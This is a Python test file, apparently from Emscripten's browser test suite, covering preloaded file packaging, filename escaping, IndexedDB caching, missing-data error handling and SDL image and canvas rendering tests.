    if not is_firefox():
        return lambda f: f
    return unittest.skip(note)
def no_swiftshader(f):
    """Decorator: skips the test when Chrome runs on the SwiftShader GL backend."""
    import functools
    assert callable(f)

    # Fix: preserve the wrapped test's name/docstring for tooling and reports.
    @functools.wraps(f)
    def decorated(self):
        if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
            self.skipTest('not compatible with swiftshader')
        return f(self)

    return decorated
def requires_threads(f):
    """Decorator: skips the test when the host opts out of thread support."""
    import functools
    assert callable(f)

    # Fix: preserve the wrapped test's name/docstring for tooling and reports.
    @functools.wraps(f)
    def decorated(self, *args, **kwargs):
        if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
            self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
        return f(self, *args, **kwargs)

    return decorated
def requires_asmfs(f):
    """Decorator: currently always skips -- ASMFS is looking for a maintainer."""
    import functools
    assert callable(f)

    # Fix: preserve the wrapped test's name/docstring for tooling and reports.
    @functools.wraps(f)
    def decorated(self, *args, **kwargs):
        # https://github.com/emscripten-core/emscripten/issues/9534
        self.skipTest('ASMFS is looking for a maintainer')
        return f(self, *args, **kwargs)

    return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
    """Decorator factory: unconditionally skips (wasm is the only backend now)."""
    # A callable here means the decorator was applied without parentheses.
    assert not callable(note)
    return unittest.skip(note)
# Skip decorators driven by EMTEST_LACKS_* environment variables, letting a
# test machine opt out of capabilities it does not have.
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
# Chrome cannot synchronously compile non-tiny wasm modules, so skip there.
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
    """One-time suite setup: longer per-test timeout plus a user notice."""
    super(browser, cls).setUpClass()
    # Browser round-trips are slow; allow each test a full minute.
    cls.browser_timeout = 60
    print()
    print('Running the browser tests. Make sure the browser allows popups from localhost.')
    print()
def setUp(self):
    """Per-test setup: silence compiler warnings common in browser tests."""
    # NOTE(review): super(BrowserCore, self) skips BrowserCore.setUp and
    # calls its parent's -- looks deliberate, but confirm against BrowserCore.
    super(BrowserCore, self).setUp()
    # avoid various compiler warnings that many browser tests currently generate
    self.emcc_args += [
        '-Wno-pointer-sign',
        '-Wno-int-conversion',
    ]
def test_sdl1_in_emscripten_nonstrict_mode(self):
    """SDL1 auto-linking still works outside strict mode (deprecated behavior)."""
    # Strict mode disables implicit system JS library linking, so bail out.
    if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
        self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
    # TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
    # system JS libraries are no longer automatically linked to anymore.
    self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
    """hello_world_sdl renders the reference image with -lSDL and with -s USE_SDL."""
    # -s USE_SDL is the default anyhow, so both variants must behave the same.
    for link_args in (['-lSDL', '-lGL'], ['-s', 'USE_SDL', '-lGL']):
        self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=link_args)
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
    """Builds with -g4 and opens the page so a human can inspect source maps.

    Semi-manual: asserts the .html and .wasm.map outputs exist, then opens
    the page in a real browser for visual verification.
    """
    if not has_browser():
        self.skipTest('need a browser')
    cpp_file = 'src.cpp'
    html_file = 'src.html'
    # browsers will try to 'guess' the corresponding original line if a
    # generated line is unmapped, so if we want to make sure that our
    # numbering is correct, we need to provide a couple of 'possible wrong
    # answers'. thus, we add some printf calls so that the cpp file gets
    # multiple mapped lines. in other words, if the program consists of a
    # single 'throw' statement, browsers may just map any thrown exception to
    # that line, because it will be the only mapped line.
    with open(cpp_file, 'w') as f:
        f.write(r'''
        #include <cstdio>
        int main() {
          printf("Starting test\n");
          try {
            throw 42; // line 8
          } catch (int e) { }
          printf("done\n");
          return 0;
        }
        ''')
    # use relative paths when calling emcc, because file:// URIs can only load
    # sourceContent when the maps are relative paths
    try_delete(html_file)
    try_delete(html_file + '.map')
    self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
    self.assertExists(html_file)
    self.assertExists('src.wasm.map')
    # Hand the page to a real browser for manual inspection of the mapping.
    webbrowser.open_new('file://' + html_file)
    print('''
If manually bisecting:
  Check that you see src.cpp among the page sources.
  Even better, add a breakpoint, e.g. on the printf, then reload, then step
  through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
    """emscripten_log output works when built with source maps (-g4)."""
    self.btest_exit(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp'), 0,
                    args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
    """Exercises --preload-file end to end.

    Covers src@dst mappings, '@@' escaping of literal at-signs, tricky
    filenames, absolute source paths, directory packaging with
    --exclude-file, output into a subdirectory, and FS.createPreloadedFile.
    """
    # Three source files with the same contents: a plain name, a hidden
    # dot-file, and a name containing a literal '@' (needs '@@' escaping).
    absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
    open(absolute_src_path, 'w').write('''load me right before running the code please''')
    absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
    open(absolute_src_path2, 'w').write('''load me right before running the code please''')
    absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
    open(absolute_src_path3, 'w').write('''load me right before running the code please''')

    def make_main(path):
        # Writes a main.cpp that opens 'path' on the virtual FS and reports
        # whether it holds the expected preloaded contents.
        print('make main at', path)
        path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
        create_test_file('main.cpp', r'''
        #include <stdio.h>
        #include <string.h>
        #include <emscripten.h>
        int main() {
          FILE *f = fopen("%s", "r");
          char buf[100];
          fread(buf, 1, 20, f);
          buf[20] = 0;
          fclose(f);
          printf("|%%s|\n", buf);
          int result = !strcmp("load me right before", buf);
          REPORT_RESULT(result);
          return 0;
        }
        ''' % path)

    test_cases = [
        # (source preload-file string, file on target FS to load)
        ("somefile.txt", "somefile.txt"),
        (".somefile.txt@somefile.txt", "somefile.txt"),
        ("./somefile.txt", "somefile.txt"),
        ("somefile.txt@file.txt", "file.txt"),
        ("./somefile.txt@file.txt", "file.txt"),
        ("./somefile.txt@./file.txt", "file.txt"),
        ("somefile.txt@/file.txt", "file.txt"),
        ("somefile.txt@/", "somefile.txt"),
        (absolute_src_path + "@file.txt", "file.txt"),
        (absolute_src_path + "@/file.txt", "file.txt"),
        (absolute_src_path + "@/", "somefile.txt"),
        ("somefile.txt@/directory/file.txt", "/directory/file.txt"),
        ("somefile.txt@/directory/file.txt", "directory/file.txt"),
        (absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
        ("some@@file.txt@other.txt", "other.txt"),
        ("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]

    for srcpath, dstpath in test_cases:
        print('Testing', srcpath, dstpath)
        make_main(dstpath)
        self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
        self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

    if WINDOWS:
        # On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
        # The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
        tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
    else:
        # All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
        tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
    open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
    make_main(tricky_filename)
    # As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
    self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

    # By absolute path
    make_main('somefile.txt') # absolute becomes relative
    self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

    # Test subdirectory handling with asset packaging.
    try_delete('assets')
    ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
    ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
    ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
    create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
    create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
    create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
    absolute_assets_src_path = 'assets'.replace('\\', '/')

    def make_main_two_files(path1, path2, nonexistingpath):
        # Like make_main, but also checks that path2 exists and that
        # nonexistingpath was correctly excluded from the package.
        create_test_file('main.cpp', r'''
        #include <stdio.h>
        #include <string.h>
        #include <emscripten.h>
        int main() {
          FILE *f = fopen("%s", "r");
          char buf[100];
          fread(buf, 1, 20, f);
          buf[20] = 0;
          fclose(f);
          printf("|%%s|\n", buf);
          int result = !strcmp("load me right before", buf);
          f = fopen("%s", "r");
          if (f == NULL)
            result = 0;
          fclose(f);
          f = fopen("%s", "r");
          if (f != NULL)
            result = 0;
          REPORT_RESULT(result);
          return 0;
        }
        ''' % (path1, path2, nonexistingpath))

    test_cases = [
        # (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
        ("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
        ("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
        ("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
        ("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
        ("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
        (absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
        (absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]

    for test in test_cases:
        (srcpath, dstpath1, dstpath2, nonexistingpath) = test
        make_main_two_files(dstpath1, dstpath2, nonexistingpath)
        print(srcpath)
        self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
        self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

    # Should still work with -o subdir/..
    make_main('somefile.txt') # absolute becomes relative
    ensure_dir('dirrey')
    self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
    self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')

    # With FS.preloadFile
    create_test_file('pre.js', '''
    Module.preRun = function() {
      FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
    };
    ''')
    make_main('someotherfile.txt')
    self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
    """A hand-written shell page can fetch the --preload-file .data package itself."""
    create_test_file('file.txt', 'Hello!')
    source = path_from_root('tests/manual_download_data.cpp')
    self.compile_btest([source, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
    # Use the custom shell page that performs the manual download.
    shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
    self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
    """Quotes in output file/directory names are escaped correctly end to end."""
    tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.

    d = 'dir with ' + tricky_part
    abs_d = os.path.join(self.get_dir(), d)
    ensure_dir(abs_d)
    txt = 'file with ' + tricky_part + '.txt'
    abs_txt = os.path.join(abs_d, txt)
    open(abs_txt, 'w').write('load me right before')

    # The C source itself also lives at a tricky path and opens the tricky file.
    cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
    open(cpp, 'w').write(r'''
    #include <stdio.h>
    #include <string.h>
    #include <emscripten.h>
    int main() {
      FILE *f = fopen("%s", "r");
      char buf[100];
      fread(buf, 1, 20, f);
      buf[20] = 0;
      fclose(f);
      printf("|%%s|\n", buf);
      int result = !strcmp("|load me right before|", buf);
      REPORT_RESULT(result);
      return 0;
    }
    ''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))

    # Package the data with the file packager, then build against it.
    data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
    data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
    self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
    page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
    abs_page_file = os.path.join(self.get_dir(), page_file)
    self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
    self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
    """--use-preload-cache serves packages from IndexedDB on the second load.

    The C side reports 1 on a cold (uncached) load and 2 on a warm load,
    via the checkPreloadResults() JS library helper below.
    """
    create_test_file('main.cpp', r'''
    #include <stdio.h>
    #include <string.h>
    #include <emscripten.h>

    extern "C" {
      extern int checkPreloadResults();
    }

    int main(int argc, char** argv) {
      FILE *f = fopen("%s", "r");
      char buf[100];
      fread(buf, 1, 20, f);
      buf[20] = 0;
      fclose(f);
      printf("|%%s|\n", buf);

      int result = 0;

      result += !strcmp("load me right before", buf);
      result += checkPreloadResults();

      REPORT_RESULT(result);
      return 0;
    }
    ''' % 'somefile.txt')

    # JS library helper: counts how many preloaded packages came from cache.
    create_test_file('test.js', '''
    mergeInto(LibraryManager.library, {
      checkPreloadResults: function() {
        var cached = 0;
        var packages = Object.keys(Module['preloadResults']);
        packages.forEach(function(package) {
          var fromCache = Module['preloadResults'][package]['fromCache'];
          if (fromCache)
            ++ cached;
        });
        return cached;
      }
    });
    ''')

    # test caching of various sizes, including sizes higher than 128MB which is
    # chrome's limit on IndexedDB item sizes, see
    # https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
    # https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
    for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
        if is_chrome() and extra_size >= 100 * 1024 * 1024:
            continue
        create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
        print('size:', os.path.getsize('somefile.txt'))
        self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
        # First load: nothing cached yet (result 1); second load: cached (result 2).
        self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
        self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
  """Like test_preload_caching, but packages the data with a custom
  ``--indexedDB-name`` via the standalone file packager instead of emcc's
  --preload-file; first run reports 1 (uncached), reload reports 2 (cached).
  """
  create_test_file('somefile.txt', '''load me right before running the code please''')
  def make_main(path):
    # Writes a main.cpp that reads `path` and adds checkPreloadResults().
    print(path)
    create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
  # JS library counting how many preloaded packages were served from the cache.
  create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
  make_main('somefile.txt')
  self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
  self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
  self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
  self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
  """Preload multiple files in nested directories, both as individual
  --preload-file arguments and as one whole-directory argument; in the
  latter case the source directory is removed before running to prove the
  data really comes from the package."""
  # a few files inside a directory
  ensure_dir(os.path.join('subdirr', 'moar'))
  create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
  create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
  create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
  # by individual files
  self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
  self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
  os.remove('page.html')
  # by directory, and remove files to make sure
  self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
  shutil.rmtree('subdirr')
  self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
  """Serve the preloaded .data package from a custom "cdn/" prefix via a
  Module.locateFile override injected into the default shell.

  Fix over the original: the stock shell is read with a ``with`` block so the
  file handle is closed deterministically (the original leaked it from
  ``open(...).read()``).
  """
  # a few files inside a directory
  ensure_dir('subdirr')
  ensure_dir('cdn')
  create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
  # change the file package base dir to look in a "cdn". note that normally
  # you would add this in your own custom html file etc., and not by
  # modifying the existing shell in this manner
  with open(path_from_root('src', 'shell.html')) as f:
    default_shell = f.read()
  create_test_file('shell.html', default_shell.replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
  create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
  self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
  # Move the package into the cdn dir; the page must find it there via locateFile.
  shutil.move('test.data', os.path.join('cdn', 'test.data'))
  self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
  """A missing or unreachable .data package must reach window.onerror with a
  message naming the package (reported as 1); main() must never run.

  Three failure modes are exercised: a 404 on the data file, an unknown URL
  protocol, and a wrong protocol/port.
  """
  def setup(assetLocalization):
    # Rebuild the fixture files with the given locateFile prefix baked into
    # the shell HTML.
    self.clear()
    create_test_file('data.txt', 'data')
    create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
    create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
  def test():
    # test test missing file should run xhr.onload with status different than 200, 304 or 206
    setup("")
    self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
    # Rename the package so the fetch 404s.
    shutil.move('test.data', 'missing.data')
    self.run_browser('test.html', '', '/report_result?1')
    # test unknown protocol should go through xhr.onerror
    setup("unknown_protocol://")
    self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
    self.run_browser('test.html', '', '/report_result?1')
    # test wrong protocol and port
    setup("https://localhost:8800/")
    self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
    self.run_browser('test.html', '', '/report_result?1')
  test()
  # TODO: CORS, test using a full url for locateFile
  # create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
  # test()
def test_dev_random(self):
  """Reading /dev/random through the virtual FS should report success (0)."""
  src = os.path.join('filesystem', 'dev_random.cpp')
  self.btest(src, expected='0')
def test_sdl_swsurface(self):
  """SDL software-surface creation should succeed (reports 1)."""
  self.btest('sdl_swsurface.c', expected='1', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
  """Emscripten-specific extensions that optimize SDL_LockSurface and
  SDL_UnlockSurface (enabled via -DTEST_SDL_LOCK_OPTS)."""
  flags = ['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL']
  self.btest('hello_world_sdl.cpp', reference='htmltest.png',
             message='You should see "hello, world!" and a colored cube.', args=flags)
def test_sdl_image(self):
  """Load a JPEG through SDL and read back pixel data. Also covers -O2 with
  --preload-file, both --memory-init-file modes, and the @-destination
  syntax of --preload-file."""
  shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
  src = path_from_root('tests', 'sdl_image.c')
  preload_variants = [
    ('screenshot.jpg', '/', 'screenshot.jpg'),
    ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg'),
  ]
  for mem in (0, 1):
    for dest, dirname, basename in preload_variants:
      flags = [src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
               '--preload-file', dest,
               '-DSCREENSHOT_DIRNAME="' + dirname + '"',
               '-DSCREENSHOT_BASENAME="' + basename + '"',
               '--use-preload-plugins']
      self.compile_btest(flags)
      self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
  """Same as test_sdl_image but with a .jpeg (not .jpg) extension, so the
  preload plugin must recognize that suffix too."""
  shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
  src = path_from_root('tests', 'sdl_image.c')
  flags = [src, '-o', 'page.html', '-lSDL', '-lGL',
           '--preload-file', 'screenshot.jpeg',
           '-DSCREENSHOT_DIRNAME="/"',
           '-DSCREENSHOT_BASENAME="screenshot.jpeg"',
           '--use-preload-plugins']
  self.compile_btest(flags)
  self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
  """emscripten_run_preload_plugins on a file with a non-image extension;
  pixel data is compared against the reference screenshot."""
  shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
  flags = ['--preload-file', 'screenshot.not', '-lSDL', '-lGL']
  self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=flags,
             also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
  """Like test_sdl_image_prepare, but decoding from an in-memory buffer."""
  shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
  flags = ['--preload-file', 'screenshot.not', '-lSDL', '-lGL']
  self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=flags,
             manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
  """Image decode path that requires an explicit prepare step."""
  shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
  flags = ['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL']
  self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=flags,
             manually_trigger_reftest=True)
def test_sdl_stb_image(self):
  """Decode an image with the STB_IMAGE backend instead of the browser's
  codecs and compare pixel data against the reference."""
  shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
  flags = ['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']
  self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=flags)
def test_sdl_stb_image_bpp(self):
  """STB_IMAGE must handle every source bit depth: bpp1 = grayscale,
  bpp2 = grayscale+alpha, bpp3 = RGB, bpp4 = RGBA."""
  flags = ['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']
  for reference in ('sdl-stb-bpp1.png', 'sdl-stb-bpp2.png', 'sdl-stb-bpp3.png', 'sdl-stb-bpp4.png'):
    self.clear()
    shutil.copyfile(path_from_root('tests', reference), 'screenshot.not')
    self.btest('sdl_stb_image.c', reference=reference, args=flags)
def test_sdl_stb_image_data(self):
  """STB_IMAGE decode from an in-memory buffer rather than a file path."""
  shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
  flags = ['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL']
  self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=flags)
def test_sdl_stb_image_cleanup(self):
  """STB_IMAGE resources must be released; run with --memoryprofiler so
  leaks would be visible, expecting a clean exit (0)."""
  shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
  flags = ['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler']
  self.btest('sdl_stb_image_cleanup.c', expected='0', args=flags)
def test_sdl_canvas(self):
  """SDL canvas rendering under LEGACY_GL_EMULATION, plus extra coverage
  with SAFE_HEAP at -O0 and -O2."""
  for extra in ([], ['-O0', '-s', 'SAFE_HEAP'], ['-O2', '-s', 'SAFE_HEAP']):
    self.clear()
    self.btest('sdl_canvas.c', expected='1',
               args=['-s', 'LEGACY_GL_EMULATION'] + extra + ['-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
  """Post-build hook: inject a manual reftest trigger into test.html.

  The injected script wraps window.close so that, before the page closes,
  the rendered canvas is compared against the reference image (after a
  delay that lets outstanding rAF callbacks update the screen).

  Fix over the original: both reads go through ``with`` blocks so the file
  handles are closed deterministically (the original leaked them from
  ``open(...).read()``).

  reference: reference image path; defaults to self.reference.
  """
  self.reftest(path_from_root('tests', self.reference if reference is None else reference))
  with open('test.html') as f:
    html = f.read()
  with open('reftest.js') as f:
    reftest_js = f.read()
  html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % reftest_js)
  create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
  """SDL canvas rendering from a proxied worker, verified by manual reftest."""
  create_test_file('data.txt', 'datum')
  flags = ['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL']
  self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=flags,
             manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
  # test .js target with --proxy-worker; emits 2 js files, client and worker
  src = path_from_root('tests', 'hello_world_gles_proxy.c')
